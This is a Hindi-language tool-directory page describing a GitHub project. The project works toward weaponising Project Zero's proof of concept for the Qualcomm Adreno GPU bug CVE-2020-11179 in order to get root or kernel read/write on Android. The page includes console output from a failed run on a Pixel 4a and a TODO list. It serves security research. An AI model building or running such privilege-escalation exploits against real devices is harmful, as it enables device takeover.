Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-11179-Adreno-Qualcomm-GPU — CVE-2020-11179 Adreno-Qualcomm-GPU बग के उत्पादीकरण प्रयास, मूल पीओसी P0 के Ben Hawkes द्वारा | Kitploit
उपकरण/GitHubGitHub/sparrow-labz/cve-2020-11179-adreno-qualcomm-gpu
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणमोबाइल सुरक्षाहार्डवेयर सुरक्षाबाइनरी शोषण
GitHubsparrow-labz/cve-2020-11179-adreno-qualcomm-gpu

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-11179-Adreno-Qualcomm-GPU

CVE-2020-11179 Adreno-Qualcomm-GPU बग के उत्पादीकरण प्रयास, मूल पीओसी P0 के Ben Hawkes द्वारा

रिपॉजिटरी देखें
73151 साल पहलेअभी तक समीक्षित नहीं

मेरा स्वतंत्र कार्य P0 शोधकर्ता Ben Hawkes द्वारा बनाए गए poc पर आधारित है
मूल लेख: https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html

मेरा लक्ष्य उसके poc को C में बदलना है, और जहाँ उसने छोड़ा था वहाँ से आगे बढ़ना है और poc को या तो root shell बनाना है,
या kernel r/w, और फिर सिस्टम को किसी तरह बदलना है ताकि kernel exec दिखे।

  • सबसे संभावित है, मेरे टेस्ट फोन पर ttbr0 का ऑफसेट अलग है
  • ऑफसेट खोजने के लिए गणना और डीबग करने की आवश्यकता है

sunfish:/data/local/tmp $ ./adrenaline 0xfc45c000
main: rptr is passed as 0xfc45c000
main: rptr base is 0xfc45c000
adrenaline: starting adrenaline
parent: starting adrenaline_parent
child: starting adrenaline_child
parent: kick off the wait command, and follow it with the correct amount of alignment nops
parent: send a message to our child process, which will kick off a GPU context switch
parent: wait for confirmation that the context switch is in before proceeding
child: recive 6 inf pipe buff, and kick off a GPU context switch
child: let the parent process know that the context switch has been dispatched
parent: fill up the rest of ringbuffer 0
parent: signal the wait command to progress to scratch buffer rptr corruption
parent: scratch buffer rptr corrupt with AAAA
00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............|
parent: exploit payload buffer
00000000 41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00 |AAAABBBB........|
adrenaline race lost: context id: (15), rptr_base: (0xfc45c000) -- try again \

टेस्ट डिवाइस: pixel 4a
android 10 बिल्ड QD4A.2000317.027 पर

TODO:

  • कॉन्टेक्स्ट स्विच और रेस कंडीशन पर काम करें
  • कर्नेल कोड exec प्राप्त करने के लिए
टूल डाउनलोड करें